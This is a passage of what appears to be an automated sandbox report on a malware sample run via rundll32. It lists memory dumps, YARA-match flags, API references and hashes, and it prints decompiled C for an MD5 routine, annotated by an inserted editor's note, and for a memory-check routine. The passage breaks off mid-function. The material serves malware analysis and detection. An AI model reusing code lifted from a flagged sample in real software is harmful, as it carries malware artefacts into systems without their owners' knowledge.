                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                            • String ID:
                                            • API String ID: 1700061692-0
                                            • Opcode ID: 2d9a123ea61fb2b65d2b74bd5a3f784eeb9c820bbbe2fe5c799b8b2bd3de03f8
                                            • Instruction ID: ec0070d6d786c14f778f264cdd179ea6c9a9379df649fd31eaf045854b2ce8ca
                                            • Opcode Fuzzy Hash: 2d9a123ea61fb2b65d2b74bd5a3f784eeb9c820bbbe2fe5c799b8b2bd3de03f8
                                            • Instruction Fuzzy Hash: A2F0F471345210AFE7A05BA99C4EE773F98EB84374F110234FEA6C22E0CB602C958675
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0581265F
                                            • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0581269F
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 058126A8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$InformationLastQueryStatusThread
                                            • String ID:
                                            • API String ID: 2450163249-0
                                            • Opcode ID: b176fe1d5fb51a60f45121c7a7663450a6a2850e5380e86f4022628d0a9b5043
                                            • Instruction ID: 6484ed4880f5b984d8fd59cedc810d59415aa6593f518070050929d8c308e5f3
                                            • Opcode Fuzzy Hash: b176fe1d5fb51a60f45121c7a7663450a6a2850e5380e86f4022628d0a9b5043
                                            • Instruction Fuzzy Hash: 6501DA75640208BBEF11AA96DD05DAEBBBEEB84700F004065FD42E2050EA7599149B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 05801BC3
                                            • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05801BFA
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                            • String ID:
                                            • API String ID: 2533303245-0
                                            • Opcode ID: 84b874864412965690f3724c7adf7ee1d6ac0ff326908731be53d3506fad5e16
                                            • Instruction ID: 558c18fdf4176d3a966f1d5be016cad8ad002f64ecf0723e6eea705bfb4197a7
                                            • Opcode Fuzzy Hash: 84b874864412965690f3724c7adf7ee1d6ac0ff326908731be53d3506fad5e16
                                            • Instruction Fuzzy Hash: F501A736906124ABE775AA598D2CEAEBA69EFC5B65F015018FD02E7140FB30CD00D6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0580A0A4
                                            • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 0580A0BC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InformationProcessQuerymemset
                                            • String ID:
                                            • API String ID: 2040988606-0
                                            • Opcode ID: d4425b219cfc80600c44a300b9f745a91fbc37c4974e37965bac7eb9c664d458
                                            • Instruction ID: 82aa1b3dd4b2e96e439654ef1adbec3756871fd027d8fb8d1d265af30d4d774b
                                            • Opcode Fuzzy Hash: d4425b219cfc80600c44a300b9f745a91fbc37c4974e37965bac7eb9c664d458
                                            • Instruction Fuzzy Hash: 33F04FB6A4021CAADB20DA95CC49FEFBB6CEB05740F008060FE08E6090E770DF448BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 0581ADD6
                                            • SetLastError.KERNEL32(00000000), ref: 0581ADDD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$LastStatus
                                            • String ID:
                                            • API String ID: 4076355890-0
                                            • Opcode ID: d1d2632f18d5d28eac3c582d73bb5ce9a6fb2b6ec862d6e0281efc95bdea8dce
                                            • Instruction ID: 1c5ce9d48f25c85770b40827afb8ab06fded3e210fc42a4c25c4c8b074178107
                                            • Opcode Fuzzy Hash: d1d2632f18d5d28eac3c582d73bb5ce9a6fb2b6ec862d6e0281efc95bdea8dce
                                            • Instruction Fuzzy Hash: E9F0F471521309FBEF15CBD5D91AFAD7ABCEB14345F108048BA01E6080EBB4AB04DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0581B655
                                            • SetLastError.KERNEL32(00000000,?,05807B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003,?,00000318,00000008), ref: 0581B65C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$LastStatus
                                            • String ID:
                                            • API String ID: 4076355890-0
                                            • Opcode ID: 769dc9cf8d61003b9228c1dc6c62e9fb5f1d7cadb530979f0c4c87a627528990
                                            • Instruction ID: 173e64035324640186eb7f3ccbf4e6f14610fc86def0ef8841e45331b9c541aa
                                            • Opcode Fuzzy Hash: 769dc9cf8d61003b9228c1dc6c62e9fb5f1d7cadb530979f0c4c87a627528990
                                            • Instruction Fuzzy Hash: D4E09A3221521AABDF115EE9AC09D9A7F6DFB18792F008021BE56D2121DB31E8619BB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0581C1EF
                                            • SetLastError.KERNEL32(00000000,?,058028F4,?,?,?,00000040,?), ref: 0581C1F6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$LastStatus
                                            • String ID:
                                            • API String ID: 4076355890-0
                                            • Opcode ID: d177bc6dfcb9efb7c8b1311a701a26d7d53bf46199ad807c057c4fef112992fd
                                            • Instruction ID: 6c9d5183d724d6e32fc698cac16af03d2510cdcb2615881103e9684647b92f60
                                            • Opcode Fuzzy Hash: d177bc6dfcb9efb7c8b1311a701a26d7d53bf46199ad807c057c4fef112992fd
                                            • Instruction Fuzzy Hash: 1BE01A3228421AABCF126EE99C05D8A7F6DFB08641B008022BE01D2120DA31DD60ABB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0581C783
                                            • memset.NTDLL ref: 0581C792
                                              • Part of subcall function 058118FC: memset.NTDLL ref: 0581190D
                                              • Part of subcall function 058118FC: memset.NTDLL ref: 05811919
                                              • Part of subcall function 058118FC: memset.NTDLL ref: 05811944
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                            • Instruction ID: 709b258d6ca789e31f7c923a90b91aac01615ae282184df0c07a2866242921d0
                                            • Opcode Fuzzy Hash: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                            • Instruction Fuzzy Hash: 68022070541B619FC775CF29C684966B7F9BF54610B205E2ECAE7C6A90D731F881CB08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 49%
                                            			E049F198A(void* __ecx, intOrPtr* _a4) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				intOrPtr _v52;
                                            				intOrPtr _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr _v72;
                                            				void _v76;
                                            				intOrPtr* _t226;
                                            				signed int _t229;
                                            				signed int _t231;
                                            				signed int _t233;
                                            				signed int _t235;
                                            				signed int _t237;
                                            				signed int _t239;
                                            				signed int _t241;
                                            				signed int _t243;
                                            				signed int _t245;
                                            				signed int _t247;
                                            				signed int _t249;
                                            				signed int _t251;
                                            				signed int _t253;
                                            				signed int _t255;
                                            				signed int _t257;
                                            				signed int _t259;
                                            				signed int _t338;
                                            				signed char* _t348;
                                            				signed int _t349;
                                            				signed int _t351;
                                            				signed int _t353;
                                            				signed int _t355;
                                            				signed int _t357;
                                            				signed int _t359;
                                            				signed int _t361;
                                            				signed int _t363;
                                            				signed int _t365;
                                            				signed int _t367;
                                            				signed int _t376;
                                            				signed int _t378;
                                            				signed int _t380;
                                            				signed int _t382;
                                            				signed int _t384;
                                            				intOrPtr* _t400;
                                            				signed int* _t401;
                                            				signed int _t402;
                                            				signed int _t404;
                                            				signed int _t406;
                                            				signed int _t408;
                                            				signed int _t410;
                                            				signed int _t412;
                                            				signed int _t414;
                                            				signed int _t416;
                                            				signed int _t418;
                                            				signed int _t420;
                                            				signed int _t422;
                                            				signed int _t424;
                                            				signed int _t432;
                                            				signed int _t434;
                                            				signed int _t436;
                                            				signed int _t438;
                                            				signed int _t440;
                                            				signed int _t508;
                                            				signed int _t599;
                                            				signed int _t607;
                                            				signed int _t613;
                                            				signed int _t679;
                                            				void* _t682;
                                            				signed int _t683;
                                            				signed int _t685;
                                            				signed int _t690;
                                            				signed int _t692;
                                            				signed int _t697;
                                            				signed int _t699;
                                            				signed int _t718;
                                            				signed int _t720;
                                            				signed int _t722;
                                            				signed int _t724;
                                            				signed int _t726;
                                            				signed int _t728;
                                            				signed int _t734;
                                            				signed int _t740;
                                            				signed int _t742;
                                            				signed int _t744;
                                            				signed int _t746;
                                            				signed int _t748;
                                            
				// Editor's note on this decompiler output: the 64 steps below, with per-round rotations
				// 7/12/17/22, 5/9/14/20, 4/11/16/23 and 6/10/15/21 (ror 15 == rol 17, ror 10 == rol 22,
				// etc.) and additive constants such as 0xd76aa478 (printed here as -0x28955b88) and
				// 0xe8c7b756 (-0x173848aa), are the MD5 block transform. _a4 points at the four-dword
				// hash state; __ecx + 2 points at the 64-byte message block, which the loop below
				// first copies as 16 little-endian dwords into the local buffer _v76.
				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
                                            				do {
                                            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                            					_t401 =  &(_t401[1]);
                                            					_t348 =  &(_t348[4]);
                                            					_t682 = _t682 - 1;
                                            				} while (_t682 != 0);
                                            				_t6 = _t226 + 4; // 0x14eb3fc3
                                            				_t683 =  *_t6;
                                            				_t7 = _t226 + 8; // 0x8d08458b
                                            				_t402 =  *_t7;
                                            				_t8 = _t226 + 0xc; // 0x56c1184c
                                            				_t349 =  *_t8;
                                            				asm("rol eax, 0x7");
                                            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                            				asm("rol ecx, 0xc");
                                            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                            				asm("ror edx, 0xf");
                                            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                            				asm("ror esi, 0xa");
                                            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                            				_v8 = _t685;
                                            				_t690 = _v8;
                                            				asm("rol eax, 0x7");
                                            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                            				asm("rol ecx, 0xc");
                                            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                            				asm("ror edx, 0xf");
                                            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                            				asm("ror esi, 0xa");
                                            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                            				_v8 = _t692;
                                            				_t697 = _v8;
                                            				asm("rol eax, 0x7");
                                            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                            				asm("rol ecx, 0xc");
                                            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                            				asm("ror edx, 0xf");
                                            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                            				asm("ror esi, 0xa");
                                            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                            				_v8 = _t699;
                                            				asm("rol eax, 0x7");
                                            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                            				asm("rol ecx, 0xc");
                                            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                            				_t508 =  !_t357;
                                            				asm("ror edx, 0xf");
                                            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                            				_v12 = _t410;
                                            				_v12 =  !_v12;
                                            				asm("ror esi, 0xa");
                                            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                            				asm("rol eax, 0x5");
                                            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                            				asm("rol ecx, 0x9");
                                            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                            				asm("rol edx, 0xe");
                                            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                            				asm("ror esi, 0xc");
                                            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                            				asm("rol eax, 0x5");
                                            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                            				asm("rol ecx, 0x9");
                                            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                            				asm("rol edx, 0xe");
                                            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                            				asm("ror esi, 0xc");
                                            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                            				asm("rol eax, 0x5");
                                            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                            				asm("rol ecx, 0x9");
                                            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                            				asm("rol edx, 0xe");
                                            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                            				asm("ror esi, 0xc");
                                            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                            				asm("rol eax, 0x5");
                                            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                            				asm("rol ecx, 0x9");
                                            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                            				asm("rol edx, 0xe");
                                            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                            				asm("ror esi, 0xc");
                                            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                            				asm("rol eax, 0x4");
                                            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                            				asm("rol ecx, 0xb");
                                            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                            				asm("rol edx, 0x10");
                                            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                            				_t599 = _t367 ^ _t420;
                                            				asm("ror esi, 0x9");
                                            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                            				asm("rol eax, 0x4");
                                            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                            				asm("rol edi, 0xb");
                                            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                            				asm("rol edx, 0x10");
                                            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                            				_t338 = _t607 ^ _t422;
                                            				asm("ror ecx, 0x9");
                                            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                            				asm("rol eax, 0x4");
                                            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                            				asm("rol esi, 0xb");
                                            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                            				asm("rol edi, 0x10");
                                            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                            				_t424 = _t734 ^ _t613;
                                            				asm("ror ecx, 0x9");
                                            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                            				asm("rol eax, 0x4");
                                            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                            				asm("rol edx, 0xb");
                                            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                            				asm("rol esi, 0x10");
                                            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                            				asm("ror ecx, 0x9");
                                            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                            				asm("rol eax, 0x6");
                                            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                            				asm("rol edx, 0xa");
                                            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                            				asm("rol esi, 0xf");
                                            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                            				asm("ror ecx, 0xb");
                                            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                            				asm("rol eax, 0x6");
                                            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                            				asm("rol edx, 0xa");
                                            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                            				asm("rol esi, 0xf");
                                            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                            				asm("ror ecx, 0xb");
                                            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                            				asm("rol eax, 0x6");
                                            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                            				asm("rol edx, 0xa");
                                            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                            				asm("rol esi, 0xf");
                                            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                            				asm("ror edi, 0xb");
                                            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                            				asm("rol eax, 0x6");
                                            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                            				asm("rol edx, 0xa");
                                            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                            				_t400 = _a4;
                                            				asm("rol esi, 0xf");
                                            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                            				 *_t400 =  *_t400 + _t259;
                                            				asm("ror eax, 0xb");
                                            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                            				return memset( &_v76, 0, 0x40);
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                            • Instruction ID: 12d11b11c4414c86661a04a2090f93c58e9a6aae81bfb66b90c546acfba0f212
                                            • Opcode Fuzzy Hash: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                            • Instruction Fuzzy Hash: 0F22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset
                                            • String ID:
                                            • API String ID: 2221118986-0
                                            • Opcode ID: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                            • Instruction ID: a0d6a0c91544fd626a71021f8de144dfdfda74d2f994990f5dcf349519654759
                                            • Opcode Fuzzy Hash: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                            • Instruction Fuzzy Hash: 3E22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: f2c043ff54138350bde66d1f349e41fd6d37549f19fa00b7b88022dec928f800
                                            • Instruction ID: e94af9ab208554befb48d1853e2a582ff4ce3e9566e875083e2b094dbb963366
                                            • Opcode Fuzzy Hash: f2c043ff54138350bde66d1f349e41fd6d37549f19fa00b7b88022dec928f800
                                            • Instruction Fuzzy Hash: 97429E70A04B65CFCB25CF69C4946BABBF2FF49304F24896DD886DB651D334A986CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F8441(long _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				short* _v32;
                                            				void _v36;
                                            				void* _t57;
                                            				signed int _t58;
                                            				signed int _t61;
                                            				signed int _t62;
                                            				void* _t63;
                                            				signed int* _t68;
                                            				intOrPtr* _t69;
                                            				intOrPtr* _t71;
                                            				intOrPtr _t72;
                                            				intOrPtr _t75;
                                            				void* _t76;
                                            				signed int _t77;
                                            				void* _t78;
                                            				void _t80;
                                            				signed int _t81;
                                            				signed int _t84;
                                            				signed int _t86;
                                            				short* _t87;
                                            				void* _t89;
                                            				signed int* _t90;
                                            				long _t91;
                                            				signed int _t93;
                                            				signed int _t94;
                                            				signed int _t100;
                                            				signed int _t102;
                                            				void* _t104;
                                            				long _t108;
                                            				signed int _t110;
                                            
                                            				_t108 = _a4;
                                            				_t76 =  *(_t108 + 8);
                                            				if((_t76 & 0x00000003) != 0) {
                                            					L3:
                                            					return 0;
                                            				}
                                            				_a4 =  *[fs:0x4];
                                            				_v8 =  *[fs:0x8];
                                            				if(_t76 < _v8 || _t76 >= _a4) {
                                            					_t102 =  *(_t108 + 0xc);
                                            					__eflags = _t102 - 0xffffffff;
                                            					if(_t102 != 0xffffffff) {
                                            						_t91 = 0;
                                            						__eflags = 0;
                                            						_a4 = 0;
                                            						_t57 = _t76;
                                            						do {
                                            							_t80 =  *_t57;
                                            							__eflags = _t80 - 0xffffffff;
                                            							if(_t80 == 0xffffffff) {
                                            								goto L9;
                                            							}
                                            							__eflags = _t80 - _t91;
                                            							if(_t80 >= _t91) {
                                            								L20:
                                            								_t63 = 0;
                                            								L60:
                                            								return _t63;
                                            							}
                                            							L9:
                                            							__eflags =  *(_t57 + 4);
                                            							if( *(_t57 + 4) != 0) {
                                            								_t12 =  &_a4;
                                            								 *_t12 = _a4 + 1;
                                            								__eflags =  *_t12;
                                            							}
                                            							_t91 = _t91 + 1;
                                            							_t57 = _t57 + 0xc;
                                            							__eflags = _t91 - _t102;
                                            						} while (_t91 <= _t102);
                                            						__eflags = _a4;
                                            						if(_a4 == 0) {
                                            							L15:
                                            							_t81 =  *0x49fa380; // 0x0
                                            							_t110 = _t76 & 0xfffff000;
                                            							_t58 = 0;
                                            							__eflags = _t81;
                                            							if(_t81 <= 0) {
                                            								L18:
                                            								_t104 = _t102 | 0xffffffff;
                                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                            								__eflags = _t61;
                                            								if(_t61 < 0) {
                                            									_t62 = 0;
                                            									__eflags = 0;
                                            								} else {
                                            									_t62 = _a4;
                                            								}
                                            								__eflags = _t62;
                                            								if(_t62 == 0) {
                                            									L59:
                                            									_t63 = _t104;
                                            									goto L60;
                                            								} else {
                                            									__eflags = _v12 - 0x1000000;
                                            									if(_v12 != 0x1000000) {
                                            										goto L59;
                                            									}
                                            									__eflags = _v16 & 0x000000cc;
                                            									if((_v16 & 0x000000cc) == 0) {
                                            										L46:
                                            										_t63 = 1;
                                            										 *0x49fa3c8 = 1;
                                            										__eflags =  *0x49fa3c8;
                                            										if( *0x49fa3c8 != 0) {
                                            											goto L60;
                                            										}
                                            										_t84 =  *0x49fa380; // 0x0
                                            										__eflags = _t84;
                                            										_t93 = _t84;
                                            										if(_t84 <= 0) {
                                            											L51:
                                            											__eflags = _t93;
                                            											if(_t93 != 0) {
                                            												L58:
                                            												 *0x49fa3c8 = 0;
                                            												goto L5;
                                            											}
                                            											_t77 = 0xf;
                                            											__eflags = _t84 - _t77;
                                            											if(_t84 <= _t77) {
                                            												_t77 = _t84;
                                            											}
                                            											_t94 = 0;
                                            											__eflags = _t77;
                                            											if(_t77 < 0) {
                                            												L56:
                                            												__eflags = _t84 - 0x10;
                                            												if(_t84 < 0x10) {
                                            													_t86 = _t84 + 1;
                                            													__eflags = _t86;
                                            													 *0x49fa380 = _t86;
                                            												}
                                            												goto L58;
                                            											} else {
                                            												do {
                                            													_t68 = 0x49fa388 + _t94 * 4;
